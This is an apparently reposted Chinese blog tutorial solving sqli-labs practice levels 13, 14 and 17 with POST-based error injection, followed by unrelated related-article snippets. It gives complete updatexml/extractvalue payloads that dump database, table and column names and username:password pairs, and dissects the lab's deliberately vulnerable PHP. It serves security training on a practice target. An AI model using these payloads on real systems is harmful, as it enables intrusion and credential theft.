【sql靶场】第13、14、17关-post提交报错注入保姆级教程

目录

【sql靶场】第13、14、17关-post提交报错注入保姆级教程

1.知识回顾

1.报错注入深解

2.报错注入格式

3.使用的函数

4.URL

5.核心组成部分

6.数据编码规范

7.请求方法

2.第十三关

1.测试闭合

2.列数测试

3.测试回显

4.爆出数据库名

5.爆出表名

6.爆出字段

7.爆出账号密码

3.第十二关

4.第十七关

1.思路

2.分析

3.操作


【sql靶场】第13、14、17关-post提交报错注入保姆级教程

关卡讲解前回顾小知识,不看可以跳过,如果还不太会报错注入建议看sql靶场5-6关(报错注入)保姆级教程-CSDN博客

1.知识回顾
1.报错注入深解

有则利用报错显示进行注入,让报错里面携带所需的查询信息

可以通过列数不同进行判断是否有报错,但是报错注入一般是让报错函数通过构造‌非法XPath表达式强制触发数据库解析错误,其核心原理与字段数无关,原因是字段数不匹配错误发生在 ‌结果集构造阶段(如 UNION 前后字段数不一致)报错注入的异常发生在 ‌条件解析阶段(如XPath解析失败),早于结果集生成,无论主查询返回3个字段还是其他数量,条件逻辑仅影响数据过滤,不涉及字段数对比‌

2.报错注入格式

一般是通过updatexml与 extractvalue进行构造‌非法XPath表达式

?id=1' and updatexml(1,concat(0x7e,(子查询语句),0x7e),1)--+
?id=1' and extractvalue(1,concat(0x7e,(子查询语句),0x7e))--+ 

3.使用的函数

concat:将同一行中多个字段的值拼接为单个字符串,适用于单行多列数据的合并‌

group_concat:某一列的数据聚合,适用于单列多行数据的合并‌

两个可以组合使用----每次先将行中的两个字段进行拼接成字符串再进行列的每行数据聚合

GROUP_CONCAT(CONCAT(col1, col2))

区别:

concat适用于需要精准提取特定行数据的场景(如管理员账号)‌。需多次请求,效率较低‌

group_concat单次请求获取数据,但需手动拼接分片结果‌。适用于快速批量泄露(如全表用户密码)

问题:

在利用 updatexml 进行报错注入时,可能会因为查询结果因长度限制显示不全,可通过以下两种方法解决:mid()或 substr()分片截取数据,规避 updatexml() 的32字符长度限制‌

使用的语法:

limit 0,1:从第0行开始,获取1条数据。逐次修改起始位置(如 limit 1,1、limit 2,1)遍历所有记录‌

substr(string, start, length):从字符串第1位开始截取31个字符(因报错信息最大长度约32字符),

逐次修改 start 参数(如 32、63)循环获取后续内容‌。

mid(string, start, length):从字符串第1位开始截取31个字符(因报错信息最大长度约32字符),

逐次修改 start 参数(如 32、63)循环获取后续内容‌。

区别:

substr(string, start, length) 和mid(string, start, length) 均用于截取字符串的指定部分,两者语法和功能完全一致‌,但是一般使用 mid(),功能相同但兼容性更佳‌,可无缝替代 substr避免潜在语法冲突‌。

特性concat + limitgroup_concat + substr/mid
数据范围单行数据多行聚合数据
输出格式单条记录(如 user~pass多条记录合并(如 user1~pass1,user2~pass2
注入效率需多次请求遍历数据单次请求获取多行数据
长度限制处理直接适配单行输出长度需通过 substr 分段截取避免超长截断‌

4.URL

URL(Uniform Resource Locator)是互联网上唯一标识资源位置的字符串,包含协议、主机地址、路径等核心部分,用于定位和访问网络资源‌12。其标准格式为: 协议://主机地址[:端口号]/路径?查询参数#锚点 https://www.example.com:8080/api/users?id=123#section1

5.核心组成部分

‌协议(Scheme)‌,定义资源访问的通信协议,例如:

http:超文本传输协议(明文传输)‌ https:加密的HTTP协议(安全性更高)‌ ftp:文件传输协议

主机地址(Host)

域名:如 www.example.com IP地址:如 202.108.22.5

端口号:可选,默认HTTP为80,HTTPS为443,自定义端口需显式指定(如:8080)‌

‌路径(Path): 表示服务器上的资源路径,如 /api/users/img/logo.png‌12。

‌查询参数(Query Parameters):以 ? 开头,key=value 形式通过 & 分隔,用于向服务器传递附加参数,如 ?name=John&age=30。

‌锚点(Fragment)以 # 开头,用于页面内导航(如 #section1),仅客户端使用,不发送至服务器‌。

6.数据编码规范

URL中非ASCII字符(如中文、空格)需进行‌URL编码

规则如下:将字符转换为十六进制值,前缀加 %(如空格 → %20/%2F)‌,编码方式由浏览器或编程语言决定,可通过 encodeURIComponent() 等函数统一处理‌。

示例*: https://example.com/search?q=%E4%B8%AD%E6%96%87(搜索“中文”)

7.请求方法

GET请求

数据通过URL参数传递,明文暴露于地址栏,适用于非敏感数据(如搜索关键词)‌。

受URL长度限制(通常≤2048字符)‌。

POST请求

数据通过请求体传输,URL中仅包含资源路径(如 https://example.com/login)‌。

适合提交敏感信息(如密码)或大量数据(如文件上传)‌

提交方式从get变成了post,使得数据不会通过URL参数传递,明文暴露于地址栏,所以使用post提交POST请求的数据存储在‌请求体(Body)‌中,而非URL参数,URL中仅包含资源路径,这里就不需要再地址栏进行测试,但是我们可以在页面的账号密码输入里尝试,可不可以进行注入

2.第十三关

方法一

在页面的输入框直接进行注入,建议使用的注释符#

方法二

使用BurpSuite,点击代理然后点击截断的截断请求,然后打开火狐浏览器,打开关卡页面,随便输入账号密码,点击提交

在这里的注入注释符#与--+都可以

打开重发器,复制到,发送,输入目标IP与端口,响应

1-测试

个人建议使用BurpSuite,因为可以清楚看见自己的注入,如果出现错误比较好检查,也比较好修改,而在页面的输入框直接注入,第一由于输入框的大小限制,很影响注入语句的输入与观看,第二输入提交后注入语句会变成空,如果报错很难检查与修改错误

如果没有BurpSuite,可以观看Burp Suite Professional的下载安装与使用-CSDN博客

1.测试闭合

单引号闭合

1'

单引号闭合测试

1'#

单引号括号闭合测试

1')#

闭合方式是单引号加括号

2.列数测试
1') order by 3#
1') order by 2#

列数为2

3.测试回显

看有没有回显

没有回显,但是有报错,那么我们可以尝试报错注入

4.爆出数据库名
and extractvalue(1,concat(0x7e,(select database()),0x7e))--+ 
and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

5.爆出表名
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+

报错原因:查询表名,但是表名有多个(多行),这里无法全部展示出来,可以使用group_concat与mid,group_concat进行聚合,因为这里注入出来的表名没有超过32个字符,所以可以不使用mid进行截取

 and updatexml(1,concat(0x7e,mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1)--+

另外一种方法,使用limit,一行一行查询

 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+

6.爆出字段
and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_schema= 'security' and table_name='users'),1,30),0x7e),1)--+

7.爆出账号密码
and  updatexml(1,concat(0x7e,(select substr((group_concat(username,0x3a,password)),1,32) from users),0x7e),1) --+and  updatexml(1,concat(0x7e,(select mid((group_concat(username,0x3a,password)),1,32) from users),0x7e),1) --+and  updatexml(1,(select concat(username,0x7e,password) from users limit 0,1),1) --+

3.第十二关

闭合测试

单引号闭合

双引号闭合

双引号闭合测试

闭合方式是1" ,剩下的与第十三关没有什么不同了

4.第十七关
1.思路

首先我们查看17关界面,发现这一关有点不一样,这里是输入正确的账号修改密码,先不看源代码进行尝试,能不能在账号输入框里面进行注入,尝试单引号与双引号闭合,会看到页面始终错误,再尝试or,如1' or '1'='1'#,是否可以存在页面不同,有没有盲注,发现一样不行,接下来尝试密码输入框进行尝试,发现一样,那可能是需要账号与密码同时有值,但是这个是修改密码的页面,说明必须要有正确的用户名才能进行修改密码,那么我们使用正确的用户名,能不能在账号的输入框进行注入呢,尝试可以发现注入不了,既然如此,就输入正确的账号,然后在修改密码的输入框里面进行注入,尝试单引号,发现报错了,既然报错了就有报错注入,接下来只需要输入正确的账号,然后在密码框里面进行注入就好了

2.分析

查看源代码

function check_input($value){if(!empty($value)){$value = substr($value,0,15);}if (get_magic_quotes_gpc()){$value = stripslashes($value);}if (!ctype_digit($value)){$value = "'" . mysql_real_escape_string($value) . "'";}	else{$value = intval($value);}return $value;}if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=check_input($_POST['uname']);  $passwd=$_POST['passwd'];$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";$result=mysql_query($sql);
$row = mysql_fetch_array($result);if($row){$row1 = $row['username'];  	$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";mysql_query($update);echo "<br>";if (mysql_error()){echo '<font color= "#FFFF00" font size = 3 >';print_r(mysql_error());echo "</br></br>";echo "</font>";}else{echo '<font color= "#FFFF00" font size = 3 >';	echo "<br>";echo "</font>";}echo '<img src="../images/flag1.jpg"   />';	echo "</font>";}else  {echo '<font size="4.5" color="#FFFF00">';echo "</br>";echo '<img src="../images/slap1.jpg"   />';echo "</font>";  }
}

可以看到里面几段代码对注入有了限制

第一段

里面有一个限制字符长度为15的限制

function check_input($value){if(!empty($value)){$value = substr($value,0,15);}if (get_magic_quotes_gpc()){$value = stripslashes($value);}if (!ctype_digit($value)){$value = "'" . mysql_real_escape_string($value) . "'";}	else{$value = intval($value);}return $value;}

往后可以看到这个限制用在了账号,但是没有用在密码

$uname=check_input($_POST['uname']);  $passwd=$_POST['passwd'];

第二段

里面有一个限制,必须要账号密码同时有

		$row1 = $row['username'];  	$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";mysql_query($update);

既然账号密码同时要,那快递要能够查询到账号才会执行修改密码语句,才能够注入

3.操作

既然找到注入点了,剩下的与前面两关的报错注入的操作基本一样

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/34975.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

esxi,vcenter6.0安装指导

前言 esxi6.0安装和esxi6.7步骤基本一样&#xff0c;可参考vmware esxi vcenter6.7安装教程&#xff08;dell&#xff09; 环境依赖以及安装包 esxi6.0安装包vcenter6.0安装不同于6.7&#xff0c;6.5通过导入ova模版安装&#xff0c;需要安装在windows server 2008或者windo…

BigFoot Decursive lua

BigFoot Decursive lua 一键驱散脚本 国际化 ogg语音提示 初始化

2024山东大学计算机复试上机真题

2024山东大学计算机复试上机真题 2024山东大学计算机复试机试真题 历年山东大学计算机复试上机真题 历年山东大学计算机复试机试真题 在线评测&#xff1a;传动门&#xff1a;pgcode.cn 最长递减子序列 题目描述 输入数字 n&#xff0c;和 n 个整数&#xff0c;输出该数字…

【AI News | 20250316】每日AI进展

AI Repos 1、ReActMCP 将网络搜索能力集成到AI助手中的一个MCP服务&#xff1a;ReActMCP Web Search&#xff0c;相当于给AI装了个搜索引擎&#xff0c;可以实时查找最新的内容。它基于Exa API执行基本和高级网络搜索&#xff0c;高级搜索比如限制搜索的网站范围、指定日期范围…

【大模型实战篇】使用GPTQ量化QwQ-32B微调后的推理模型

1. 量化背景 之所以做量化&#xff0c;就是希望在现有的硬件条件下&#xff0c;提升性能。量化能将模型权重从高精度&#xff08;如FP32&#xff09;转换为低精度&#xff08;如INT8/FP16&#xff09;&#xff0c;内存占用可减少50%~75%。低精度运算&#xff08;如INT8&#xf…

Unity 笔记:在EditorWindow中绘制 Sorting Layer

在Unity开发过程中&#xff0c;可能会对旧资源进行批量修改&#xff0c;一个个手动修改费人费事&#xff0c;所以催生出了一堆批量工具。 分享一下在此过程中绘制 Sorting Layer 面板的代码脚本。 示意图&#xff1a; 在 EditorGUI 和 EditorGUILayer 中内置了 SortingLayerF…

idea更新git代码报错No Git Roots

idea更新git代码报错&#xff1a; No Git Roots None of configured Git roots are under Git. The configured directory must have ".git directory in it.但是本地项目里是存在.git文件的&#xff0c;就是突然间不能更新代码了 然后尝试重新拉新项目代码提示: Git i…

失败的面试经历(ʘ̥∧ʘ̥)

一.面向对象的三大特性 1.封装&#xff1a;将对象内部的属性私有化&#xff0c;外部对象不能够直接访问&#xff0c;但是可以提供一些可以使外部对象操作内部属性的方法。 2.继承&#xff1a;类与类之间会有一些相似之处&#xff0c;但也会有一些异处&#xff0c;使得他们与众…

qt加载VeloView工程

接上一篇点云软件配置与编译&#xff0c;使用qt加载需要先完成编译。编译完成后到编译目录下lidarview-superbuild\common-superbuild\lidarview\build 找到CmakeCache.txt&#xff0c;如下是我的编译目录。 使用QT6.5.3加载了CmakeCache.txt&#xff0c;QT5.14还加载不了cmake…

Windows Qt动态监测系统分辨率及缩放比变化

前言 Windows 显示设置中&#xff0c;可以修改缩放比&#xff0c;所有界面和文字会同比例放大或缩小&#xff0c;在开发桌面程序时&#xff0c; 实时监测Qt应用程序在不同缩放比例下的表现&#xff0c;可以及时调整程序界面以适应不同显示屏幕的需求。 正文 本文通过Qt相关…

CVE-2017-5645(使用 docker 搭建)

介绍: 是一个与 Apache Log4j2 相关的安全漏洞,属于远程代码执行,它可能允许攻击者通过构造恶意的日志信息 在目标系统上执行任意代码 Log4j2 介绍 Log4j2 是 Apache 的一个日志记录工具,属于 Java 应用的日志框架,它是 Log4j 的升级版,性能更好,功能更多.它被广泛的适用于 J…

交互式可视化进阶(Plotly Dash构建疫情仪表盘)

这里写目录标题 交互式可视化进阶(Plotly Dash构建疫情仪表盘)1. 引言2. 项目背景与意义3. 数据集生成与介绍4. GPU加速在数据处理中的应用5. 交互式仪表盘构建与Plotly Dash6. PyQt GUI集成与美化7. 工程整体架构8. 部分代码实现9. 代码自查与BUG排查10. 总结与展望交互式可…

RabbitMQ(补档)

RabbitMQ 是一个开源的消息队列软件&#xff08;有时也被称为消息代理&#xff09;&#xff0c;它实现了高级消息队列协议&#xff08;AMQP&#xff09;。它主要用于应用程序之间&#xff0c;或者软件组件之间的消息通信。通过使用 RabbitMQ&#xff0c;可以实现异步的、可靠的…

平方矩阵问题

Ⅰ 回字形二维数组 #include <iostream> #include <iomanip> using namespace std; int main(){int n;while(cin>>n,n){for(int i0; i<n;i){for(int j0; j<n; j){int upi, downn-i1, leftj, rightn-j1;cout<<min(min(up,down),min(left,right)…

电子电气架构 --- 智能座舱和车载基础软件简介

我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师。 老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师: 人生是一场骗局,最大的任务根本不是什么买车买房,也不是及时行乐,这就是欲望,不是理想,是把自己对生命的希望寄托在外物上,正确的做法应该是内…

Qt 通过MSVC编译运行项目

第一步下载Qt 把Qt能选的插件都选上&#xff0c;有的是连接数据库必须得插件&#xff0c;有的是做图表必须得插件&#xff0c;有的是运行MSVC必须得插件&#xff0c;能选尽量都选上。 第二步安装VS2017&#xff0c;当然我们安装2017的目的主要是用C的编译器&#xff0c;这里提…

高效手机检测:视觉分析技术的优势

在当今社会&#xff0c;手机已成为人们日常生活和工作中不可或缺的工具。然而&#xff0c;在某些特定场合&#xff0c;如考场、工作场所等&#xff0c;手机的使用却可能带来负面影响。因此&#xff0c;如何有效监测和防止在这些场合偷用手机的行为&#xff0c;成为了一个亟待解…

Gitee重新远程连接仓库(Linux)

Gitee重新远程连接仓库&#xff08;Linux&#xff09; 因为虚拟机重新安装了一回&#xff0c;所以需要重新和远程仓库连接&#xff0c;在网上找了很久没有找到相关操作&#xff0c;自己实操成功&#xff0c;记录下本博客&#xff0c;帮助有需要的人 确保新虚拟机安装Git 在新虚…

【论文笔记】FFA-Net: Feature Fusion Attention Network for Single Image Dehazing

文章目录 1. 研究背景2. FFA - Net网络结构3. 实验结果4. 研究贡献5. 重点详解1. 通道注意力&#xff08;Channel Attention, CA&#xff09;通道注意力的实现步骤&#xff1a; 2. 像素注意力&#xff08;Pixel Attention, PA&#xff09;像素注意力的实现步骤&#xff1a; 3. …